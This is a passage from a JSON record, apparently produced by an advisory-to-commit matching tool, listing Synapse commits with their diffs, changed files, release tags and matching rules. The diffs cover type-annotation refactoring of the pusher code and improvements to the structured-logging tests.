pusherdict[\"user_name\"]", - "+ self._instance_name, pusher_config.user_name", - " ):", - "@@ -319,3 +324,3 @@ class PusherPool:", - " try:", - "- p = self.pusher_factory.create_pusher(pusherdict)", - "+ p = self.pusher_factory.create_pusher(pusher_config)", - " except PusherConfigException as e:", - "@@ -323,6 +328,6 @@ class PusherPool:", - " \"Pusher incorrectly configured id=%i, user=%s, appid=%s, pushkey=%s: %s\",", - "- pusherdict[\"id\"],", - "- pusherdict.get(\"user_name\"),", - "- pusherdict.get(\"app_id\"),", - "- pusherdict.get(\"pushkey\"),", - "+ pusher_config.id,", - "+ pusher_config.user_name,", - "+ pusher_config.app_id,", - "+ pusher_config.pushkey,", - " e,", - "@@ -332,3 +337,3 @@ class PusherPool:", - " logger.exception(", - "- \"Couldn't start pusher id %i: caught Exception\", pusherdict[\"id\"],", - "+ \"Couldn't start pusher id %i: caught Exception\", pusher_config.id,", - " )", - "@@ -339,5 +344,5 @@ class PusherPool:", - "- appid_pushkey = \"%s:%s\" % (pusherdict[\"app_id\"], pusherdict[\"pushkey\"])", - "+ appid_pushkey = \"%s:%s\" % (pusher_config.app_id, pusher_config.pushkey)", - "- byuser = self.pushers.setdefault(pusherdict[\"user_name\"], {})", - "+ byuser = self.pushers.setdefault(pusher_config.user_name, {})", - " if appid_pushkey in byuser:", - "@@ -351,4 +356,4 @@ class PusherPool:", - " # push.", - "- user_id = pusherdict[\"user_name\"]", - "- last_stream_ordering = pusherdict[\"last_stream_ordering\"]", - "+ user_id = pusher_config.user_name", - "+ last_stream_ordering = pusher_config.last_stream_ordering", - " if last_stream_ordering:", - "@@ -366,3 +371,3 @@ class PusherPool:", - "- async def remove_pusher(self, app_id, pushkey, user_id):", - "+ async def remove_pusher(self, app_id: str, pushkey: str, user_id: str) -> None:", - " appid_pushkey = \"%s:%s\" % (app_id, pushkey)", - "diff --git a/synapse/replication/slave/storage/_slaved_id_tracker.py b/synapse/replication/slave/storage/_slaved_id_tracker.py", - "index eb74903d6..0d39a93ed 100644", - "--- a/synapse/replication/slave/storage/_slaved_id_tracker.py", - "+++ b/synapse/replication/slave/storage/_slaved_id_tracker.py", - "@@ -14,3 +14,5 @@", - " # limitations under the License.", - "+from typing import List, Optional, Tuple", - "+from synapse.storage.types import Connection", - " from synapse.storage.util.id_generators import _load_current_id", - "@@ -19,12 +21,20 @@ from synapse.storage.util.id_generators import _load_current_id", - " class SlavedIdTracker:", - "- def __init__(self, db_conn, table, column, extra_tables=[], step=1):", - "+ def __init__(", - "+ self,", - "+ db_conn: Connection,", - "+ table: str,", - "+ column: str,", - "+ extra_tables: Optional[List[Tuple[str, str]]] = None,", - "+ step: int = 1,", - "+ ):", - " self.step = step", - " self._current = _load_current_id(db_conn, table, column, step)", - "- for table, column in extra_tables:", - "- self.advance(None, _load_current_id(db_conn, table, column))", - "+ if extra_tables:", - "+ for table, column in extra_tables:", - "+ self.advance(None, _load_current_id(db_conn, table, column))", - "- def advance(self, instance_name, new_id):", - "+ def advance(self, instance_name: Optional[str], new_id: int):", - " self._current = (max if self.step > 0 else min)(self._current, new_id)", - "- def get_current_token(self):", - "+ def get_current_token(self) -> int:", - " \"\"\"", - "diff --git a/synapse/replication/slave/storage/pushers.py b/synapse/replication/slave/storage/pushers.py", - "index c418730ba..045bd014d 100644", - "--- a/synapse/replication/slave/storage/pushers.py", - "+++ b/synapse/replication/slave/storage/pushers.py", - "@@ -15,2 +15,3 @@", - " # limitations under the License.", - "+from typing import TYPE_CHECKING", - "@@ -19,2 +20,3 @@ from synapse.storage.database import DatabasePool", - " from synapse.storage.databases.main.pusher import PusherWorkerStore", - "+from synapse.storage.types import Connection", - "@@ -23,7 +25,10 @@ from ._slaved_id_tracker import SlavedIdTracker", - "+if TYPE_CHECKING:", - "+ from synapse.app.homeserver import HomeServer", - "+", - " class SlavedPusherStore(PusherWorkerStore, BaseSlavedStore):", - "- def __init__(self, database: DatabasePool, db_conn, hs):", - "+ def __init__(self, database: DatabasePool, db_conn: Connection, hs: \"HomeServer\"):", - " super().__init__(database, db_conn, hs)", - "- self._pushers_id_gen = SlavedIdTracker(", - "+ self._pushers_id_gen = SlavedIdTracker( # type: ignore", - " db_conn, \"pushers\", \"id\", extra_tables=[(\"deleted_pushers\", \"stream_id\")]", - "@@ -31,8 +36,10 @@ class SlavedPusherStore(PusherWorkerStore, BaseSlavedStore):", - "- def get_pushers_stream_token(self):", - "+ def get_pushers_stream_token(self) -> int:", - " return self._pushers_id_gen.get_current_token()", - "- def process_replication_rows(self, stream_name, instance_name, token, rows):", - "+ def process_replication_rows(", - "+ self, stream_name: str, instance_name: str, token, rows", - "+ ) -> None:", - " if stream_name == PushersStream.NAME:", - "- self._pushers_id_gen.advance(instance_name, token)", - "+ self._pushers_id_gen.advance(instance_name, token) # type: ignore", - " return super().process_replication_rows(stream_name, instance_name, token, rows)", - "diff --git a/synapse/rest/admin/users.py b/synapse/rest/admin/users.py", - "index 88cba369f..6658c2da5 100644", - "--- a/synapse/rest/admin/users.py", - "+++ b/synapse/rest/admin/users.py", - "@@ -44,13 +44,2 @@ logger = logging.getLogger(__name__)", - "-_GET_PUSHERS_ALLOWED_KEYS = {", - "- \"app_display_name\",", - "- \"app_id\",", - "- \"data\",", - "- \"device_display_name\",", - "- \"kind\",", - "- \"lang\",", - "- \"profile_tag\",", - "- \"pushkey\",", - "-}", - "-", - "@@ -772,6 +761,3 @@ class PushersRestServlet(RestServlet):", - "- filtered_pushers = [", - "- {k: v for k, v in p.items() if k in _GET_PUSHERS_ALLOWED_KEYS}", - "- for p in pushers", - "- ]", - "+ filtered_pushers = [p.as_dict() for p in pushers]", - "diff --git a/synapse/rest/client/v1/pusher.py b/synapse/rest/client/v1/pusher.py", - "index 8fe83f321..89823fcc3 100644", - "--- a/synapse/rest/client/v1/pusher.py", - "+++ b/synapse/rest/client/v1/pusher.py", - "@@ -30,13 +30,2 @@ logger = logging.getLogger(__name__)", - "-ALLOWED_KEYS = {", - "- \"app_display_name\",", - "- \"app_id\",", - "- \"data\",", - "- \"device_display_name\",", - "- \"kind\",", - "- \"lang\",", - "- \"profile_tag\",", - "- \"pushkey\",", - "-}", - "-", - "@@ -56,5 +45,3 @@ class PushersRestServlet(RestServlet):", - "- filtered_pushers = [", - "- {k: v for k, v in p.items() if k in ALLOWED_KEYS} for p in pushers", - "- ]", - "+ filtered_pushers = [p.as_dict() for p in pushers]", - "diff --git a/synapse/storage/databases/main/__init__.py b/synapse/storage/databases/main/__init__.py", - "index 43660ec4f..871fb646a 100644", - "--- a/synapse/storage/databases/main/__init__.py", - "+++ b/synapse/storage/databases/main/__init__.py", - "@@ -151,5 +151,2 @@ class DataStore(", - " self._push_rules_enable_id_gen = IdGenerator(db_conn, \"push_rules_enable\", \"id\")", - "- self._pushers_id_gen = StreamIdGenerator(", - "- db_conn, \"pushers\", \"id\", extra_tables=[(\"deleted_pushers\", \"stream_id\")]", - "- )", - " self._group_updates_id_gen = StreamIdGenerator(", - "diff --git a/synapse/storage/databases/main/pusher.py b/synapse/storage/databases/main/pusher.py", - "index 7997242d9..77ba9d819 100644", - "--- a/synapse/storage/databases/main/pusher.py", - "+++ b/synapse/storage/databases/main/pusher.py", - "@@ -17,3 +17,3 @@", - " import logging", - "-from typing import Iterable, Iterator, List, Tuple", - "+from typing import TYPE_CHECKING, Any, Dict, Iterable, Iterator, List, Optional, Tuple", - "@@ -21,5 +21,13 @@ from canonicaljson import encode_canonical_json", - "+from synapse.push import PusherConfig, ThrottleParams", - " from synapse.storage._base import SQLBaseStore, db_to_json", - "+from synapse.storage.database import DatabasePool", - "+from synapse.storage.types import Connection", - "+from synapse.storage.util.id_generators import StreamIdGenerator", - "+from synapse.types import JsonDict", - " from synapse.util.caches.descriptors import cached, cachedList", - "+if TYPE_CHECKING:", - "+ from synapse.app.homeserver import HomeServer", - "+", - " logger = logging.getLogger(__name__)", - "@@ -28,3 +36,9 @@ logger = logging.getLogger(__name__)", - " class PusherWorkerStore(SQLBaseStore):", - "- def _decode_pushers_rows(self, rows: Iterable[dict]) -> Iterator[dict]:", - "+ def __init__(self, database: DatabasePool, db_conn: Connection, hs: \"HomeServer\"):", - "+ super().__init__(database, db_conn, hs)", - "+ self._pushers_id_gen = StreamIdGenerator(", - "+ db_conn, \"pushers\", \"id\", extra_tables=[(\"deleted_pushers\", \"stream_id\")]", - "+ )", - "+", - "+ def _decode_pushers_rows(self, rows: Iterable[dict]) -> Iterator[PusherConfig]:", - " \"\"\"JSON-decode the data in the rows returned from the `pushers` table", - "@@ -46,5 +60,5 @@ class PusherWorkerStore(SQLBaseStore):", - "- yield r", - "+ yield PusherConfig(**r)", - "- async def user_has_pusher(self, user_id):", - "+ async def user_has_pusher(self, user_id: str) -> bool:", - " ret = await self.db_pool.simple_select_one_onecol(", - "@@ -54,9 +68,11 @@ class PusherWorkerStore(SQLBaseStore):", - "- def get_pushers_by_app_id_and_pushkey(self, app_id, pushkey):", - "- return self.get_pushers_by({\"app_id\": app_id, \"pushkey\": pushkey})", - "+ async def get_pushers_by_app_id_and_pushkey(", - "+ self, app_id: str, pushkey: str", - "+ ) -> Iterator[PusherConfig]:", - "+ return await self.get_pushers_by({\"app_id\": app_id, \"pushkey\": pushkey})", - "- def get_pushers_by_user_id(self, user_id):", - "- return self.get_pushers_by({\"user_name\": user_id})", - "+ async def get_pushers_by_user_id(self, user_id: str) -> Iterator[PusherConfig]:", - "+ return await self.get_pushers_by({\"user_name\": user_id})", - "- async def get_pushers_by(self, keyvalues):", - "+ async def get_pushers_by(self, keyvalues: Dict[str, Any]) -> Iterator[PusherConfig]:", - " ret = await self.db_pool.simple_select_list(", - "@@ -85,3 +101,3 @@ class PusherWorkerStore(SQLBaseStore):", - "- async def get_all_pushers(self):", - "+ async def get_all_pushers(self) -> Iterator[PusherConfig]:", - " def get_pushers(txn):", - "@@ -161,3 +177,3 @@ class PusherWorkerStore(SQLBaseStore):", - " @cached(num_args=1, max_entries=15000)", - "- async def get_if_user_has_pusher(self, user_id):", - "+ async def get_if_user_has_pusher(self, user_id: str):", - " # This only exists for the cachedList decorator", - "@@ -168,3 +184,5 @@ class PusherWorkerStore(SQLBaseStore):", - " )", - "- async def get_if_users_have_pushers(self, user_ids):", - "+ async def get_if_users_have_pushers(", - "+ self, user_ids: Iterable[str]", - "+ ) -> Dict[str, bool]:", - " rows = await self.db_pool.simple_select_many_batch(", - "@@ -226,3 +244,3 @@ class PusherWorkerStore(SQLBaseStore):", - " async def update_pusher_failing_since(", - "- self, app_id, pushkey, user_id, failing_since", - "+ self, app_id: str, pushkey: str, user_id: str, failing_since: Optional[int]", - " ) -> None:", - "@@ -235,3 +253,5 @@ class PusherWorkerStore(SQLBaseStore):", - "- async def get_throttle_params_by_room(self, pusher_id):", - "+ async def get_throttle_params_by_room(", - "+ self, pusher_id: str", - "+ ) -> Dict[str, ThrottleParams]:", - " res = await self.db_pool.simple_select_list(", - "@@ -245,6 +265,5 @@ class PusherWorkerStore(SQLBaseStore):", - " for row in res:", - "- params_by_room[row[\"room_id\"]] = {", - "- \"last_sent_ts\": row[\"last_sent_ts\"],", - "- \"throttle_ms\": row[\"throttle_ms\"],", - "- }", - "+ params_by_room[row[\"room_id\"]] = ThrottleParams(", - "+ row[\"last_sent_ts\"], row[\"throttle_ms\"],", - "+ )", - "@@ -252,3 +271,5 @@ class PusherWorkerStore(SQLBaseStore):", - "- async def set_throttle_params(self, pusher_id, room_id, params) -> None:", - "+ async def set_throttle_params(", - "+ self, pusher_id: str, room_id: str, params: ThrottleParams", - "+ ) -> None:", - " # no need to lock because `pusher_throttle` has a primary key on", - "@@ -258,3 +279,3 @@ class PusherWorkerStore(SQLBaseStore):", - " {\"pusher\": pusher_id, \"room_id\": room_id},", - "- params,", - "+ {\"last_sent_ts\": params.last_sent_ts, \"throttle_ms\": params.throttle_ms},", - " desc=\"set_throttle_params\",", - "@@ -265,3 +286,3 @@ class PusherWorkerStore(SQLBaseStore):", - " class PusherStore(PusherWorkerStore):", - "- def get_pushers_stream_token(self):", - "+ def get_pushers_stream_token(self) -> int:", - " return self._pushers_id_gen.get_current_token()", - "@@ -270,14 +291,14 @@ class PusherStore(PusherWorkerStore):", - " self,", - "- user_id,", - "- access_token,", - "- kind,", - "- app_id,", - "- app_display_name,", - "- device_display_name,", - "- pushkey,", - "- pushkey_ts,", - "- lang,", - "- data,", - "- last_stream_ordering,", - "- profile_tag=\"\",", - "+ user_id: str,", - "+ access_token: Optional[int],", - "+ kind: str,", - "+ app_id: str,", - "+ app_display_name: str,", - "+ device_display_name: str,", - "+ pushkey: str,", - "+ pushkey_ts: int,", - "+ lang: Optional[str],", - "+ data: Optional[JsonDict],", - "+ last_stream_ordering: int,", - "+ profile_tag: str = \"\",", - " ) -> None:", - "@@ -313,3 +334,3 @@ class PusherStore(PusherWorkerStore):", - " \"add_pusher\",", - "- self._invalidate_cache_and_stream,", - "+ self._invalidate_cache_and_stream, # type: ignore", - " self.get_if_user_has_pusher,", - "@@ -319,6 +340,6 @@ class PusherStore(PusherWorkerStore):", - " async def delete_pusher_by_app_id_pushkey_user_id(", - "- self, app_id, pushkey, user_id", - "+ self, app_id: str, pushkey: str, user_id: str", - " ) -> None:", - " def delete_pusher_txn(txn, stream_id):", - "- self._invalidate_cache_and_stream(", - "+ self._invalidate_cache_and_stream( # type: ignore", - " txn, self.get_if_user_has_pusher, (user_id,)", - "diff --git a/synapse/storage/util/id_generators.py b/synapse/storage/util/id_generators.py", - "index 02d71302e..133c0e7a2 100644", - "--- a/synapse/storage/util/id_generators.py", - "+++ b/synapse/storage/util/id_generators.py", - "@@ -155,3 +155,3 @@ class StreamIdGenerator:", - "- def get_current_token(self):", - "+ def get_current_token(self) -> int:", - " \"\"\"Returns the maximum stream id such that all stream ids less than or", - "@@ -160,3 +160,3 @@ class StreamIdGenerator:", - " Returns:", - "- int", - "+ The maximum stream id.", - " \"\"\"", - "diff --git a/tests/push/test_email.py b/tests/push/test_email.py", - "index bcdcafa5a..961bf09de 100644", - "--- a/tests/push/test_email.py", - "+++ b/tests/push/test_email.py", - "@@ -211,3 +211,3 @@ class EmailPusherTests(HomeserverTestCase):", - " self.assertEqual(len(pushers), 1)", - "- last_stream_ordering = pushers[0][\"last_stream_ordering\"]", - "+ last_stream_ordering = pushers[0].last_stream_ordering", - "@@ -222,3 +222,3 @@ class EmailPusherTests(HomeserverTestCase):", - " self.assertEqual(len(pushers), 1)", - "- self.assertEqual(last_stream_ordering, pushers[0][\"last_stream_ordering\"])", - "+ self.assertEqual(last_stream_ordering, pushers[0].last_stream_ordering)", - "@@ -240,2 +240,2 @@ class EmailPusherTests(HomeserverTestCase):", - " self.assertEqual(len(pushers), 1)", - "- self.assertTrue(pushers[0][\"last_stream_ordering\"] > last_stream_ordering)", - "+ self.assertTrue(pushers[0].last_stream_ordering > last_stream_ordering)", - "diff --git a/tests/push/test_http.py b/tests/push/test_http.py", - "index cb3245d8c..60f0820cf 100644", - "--- a/tests/push/test_http.py", - "+++ b/tests/push/test_http.py", - "@@ -146,3 +146,3 @@ class HTTPPusherTests(HomeserverTestCase):", - " self.assertEqual(len(pushers), 1)", - "- last_stream_ordering = pushers[0][\"last_stream_ordering\"]", - "+ last_stream_ordering = pushers[0].last_stream_ordering", - "@@ -157,3 +157,3 @@ class HTTPPusherTests(HomeserverTestCase):", - " self.assertEqual(len(pushers), 1)", - "- self.assertEqual(last_stream_ordering, pushers[0][\"last_stream_ordering\"])", - "+ self.assertEqual(last_stream_ordering, pushers[0].last_stream_ordering)", - "@@ -178,4 +178,4 @@ class HTTPPusherTests(HomeserverTestCase):", - " self.assertEqual(len(pushers), 1)", - "- self.assertTrue(pushers[0][\"last_stream_ordering\"] > last_stream_ordering)", - "- last_stream_ordering = pushers[0][\"last_stream_ordering\"]", - "+ self.assertTrue(pushers[0].last_stream_ordering > last_stream_ordering)", - "+ last_stream_ordering = pushers[0].last_stream_ordering", - "@@ -200,3 +200,3 @@ class HTTPPusherTests(HomeserverTestCase):", - " self.assertEqual(len(pushers), 1)", - "- self.assertTrue(pushers[0][\"last_stream_ordering\"] > last_stream_ordering)", - "+ self.assertTrue(pushers[0].last_stream_ordering > last_stream_ordering)", - "diff --git a/tests/rest/admin/test_user.py b/tests/rest/admin/test_user.py", - "index 582f98322..df62317e6 100644", - "--- a/tests/rest/admin/test_user.py", - "+++ b/tests/rest/admin/test_user.py", - "@@ -768,3 +768,3 @@ class UserRestTestCase(unittest.HomeserverTestCase):", - " self.assertEqual(len(pushers), 1)", - "- self.assertEqual(\"@bob:test\", pushers[0][\"user_name\"])", - "+ self.assertEqual(\"@bob:test\", pushers[0].user_name)" - ], - "changed_files": [ - "changelog.d/8940.misc", - "mypy.ini", - "synapse/push/__init__.py", - "synapse/push/emailpusher.py", - "synapse/push/httppusher.py", - "synapse/push/pusher.py", - "synapse/push/pusherpool.py", - "synapse/replication/slave/storage/_slaved_id_tracker.py", - "synapse/replication/slave/storage/pushers.py", - "synapse/rest/admin/users.py", - "synapse/rest/client/v1/pusher.py", - "synapse/storage/databases/main/__init__.py", - "synapse/storage/databases/main/pusher.py", - "synapse/storage/util/id_generators.py", - "tests/push/test_email.py", - "tests/push/test_http.py", - "tests/rest/admin/test_user.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8940": "" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [ - { - "id": "XREF_GH", - "message": "The commit and the advisory (including referenced pages) mention the same github issue: 8940, 8940", - "relevance": 32 - }, - { - "id": "GITHUB_ISSUE_IN_MESSAGE", - "message": "The commit message references some github issue: 8940", - "relevance": 2 - } - ] - }, - { - "commit_id": "3af0672350965b4fddf3aad2904795bbd0199c30", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607689501, - "hunks": 11, - "message": "Improve tests for structured logging. (#8916)", - "diff": [ - "diff --git a/changelog.d/8916.misc b/changelog.d/8916.misc", - "new file mode 100644", - "index 000000000..c71ef480e", - "--- /dev/null", - "+++ b/changelog.d/8916.misc", - "@@ -0,0 +1 @@", - "+Improve structured logging tests.", - "diff --git a/tests/logging/test_terse_json.py b/tests/logging/test_terse_json.py", - "index 73f469b80..f6e7e5fda 100644", - "--- a/tests/logging/test_terse_json.py", - "+++ b/tests/logging/test_terse_json.py", - "@@ -20,2 +20,3 @@ from io import StringIO", - " from synapse.logging._terse_json import JsonFormatter, TerseJsonFormatter", - "+from synapse.logging.context import LoggingContext, LoggingContextFilter", - "@@ -26,2 +27,13 @@ from tests.unittest import TestCase", - " class TerseJsonTestCase(LoggerCleanupMixin, TestCase):", - "+ def setUp(self):", - "+ self.output = StringIO()", - "+", - "+ def get_log_line(self):", - "+ # One log message, with a single trailing newline.", - "+ data = self.output.getvalue()", - "+ logs = data.splitlines()", - "+ self.assertEqual(len(logs), 1)", - "+ self.assertEqual(data.count(\"\\n\"), 1)", - "+ return json.loads(logs[0])", - "+", - " def test_terse_json_output(self):", - "@@ -30,5 +42,3 @@ class TerseJsonTestCase(LoggerCleanupMixin, TestCase):", - " \"\"\"", - "- output = StringIO()", - "-", - "- handler = logging.StreamHandler(output)", - "+ handler = logging.StreamHandler(self.output)", - " handler.setFormatter(TerseJsonFormatter())", - "@@ -38,8 +48,3 @@ class TerseJsonTestCase(LoggerCleanupMixin, TestCase):", - "- # One log message, with a single trailing newline.", - "- data = output.getvalue()", - "- logs = data.splitlines()", - "- self.assertEqual(len(logs), 1)", - "- self.assertEqual(data.count(\"\\n\"), 1)", - "- log = json.loads(logs[0])", - "+ log = self.get_log_line()", - "@@ -59,5 +64,3 @@ class TerseJsonTestCase(LoggerCleanupMixin, TestCase):", - " \"\"\"", - "- output = StringIO()", - "-", - "- handler = logging.StreamHandler(output)", - "+ handler = logging.StreamHandler(self.output)", - " handler.setFormatter(TerseJsonFormatter())", - "@@ -69,8 +72,3 @@ class TerseJsonTestCase(LoggerCleanupMixin, TestCase):", - "- # One log message, with a single trailing newline.", - "- data = output.getvalue()", - "- logs = data.splitlines()", - "- self.assertEqual(len(logs), 1)", - "- self.assertEqual(data.count(\"\\n\"), 1)", - "- log = json.loads(logs[0])", - "+ log = self.get_log_line()", - "@@ -98,5 +96,3 @@ class TerseJsonTestCase(LoggerCleanupMixin, TestCase):", - " \"\"\"", - "- output = StringIO()", - "-", - "- handler = logging.StreamHandler(output)", - "+ handler = logging.StreamHandler(self.output)", - " handler.setFormatter(JsonFormatter())", - "@@ -106,8 +102,27 @@ class TerseJsonTestCase(LoggerCleanupMixin, TestCase):", - "- # One log message, with a single trailing newline.", - "- data = output.getvalue()", - "- logs = data.splitlines()", - "- self.assertEqual(len(logs), 1)", - "- self.assertEqual(data.count(\"\\n\"), 1)", - "- log = json.loads(logs[0])", - "+ log = self.get_log_line()", - "+", - "+ # The terse logger should give us these keys.", - "+ expected_log_keys = [", - "+ \"log\",", - "+ \"level\",", - "+ \"namespace\",", - "+ ]", - "+ self.assertCountEqual(log.keys(), expected_log_keys)", - "+ self.assertEqual(log[\"log\"], \"Hello there, wally!\")", - "+", - "+ def test_with_context(self):", - "+ \"\"\"", - "+ The logging context should be added to the JSON response.", - "+ \"\"\"", - "+ handler = logging.StreamHandler(self.output)", - "+ handler.setFormatter(JsonFormatter())", - "+ handler.addFilter(LoggingContextFilter(request=\"\"))", - "+ logger = self.get_logger(handler)", - "+", - "+ with LoggingContext() as context_one:", - "+ context_one.request = \"test\"", - "+ logger.info(\"Hello there, %s!\", \"wally\")", - "+", - "+ log = self.get_log_line()", - "@@ -118,2 +133,4 @@ class TerseJsonTestCase(LoggerCleanupMixin, TestCase):", - " \"namespace\",", - "+ \"request\",", - "+ \"scope\",", - " ]", - "@@ -121 +138,3 @@ class TerseJsonTestCase(LoggerCleanupMixin, TestCase):", - " self.assertEqual(log[\"log\"], \"Hello there, wally!\")", - "+ self.assertEqual(log[\"request\"], \"test\")", - "+ self.assertIsNone(log[\"scope\"])" - ], - "changed_files": [ - "changelog.d/8916.misc", - "tests/logging/test_terse_json.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": { - "8916": "" - }, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - 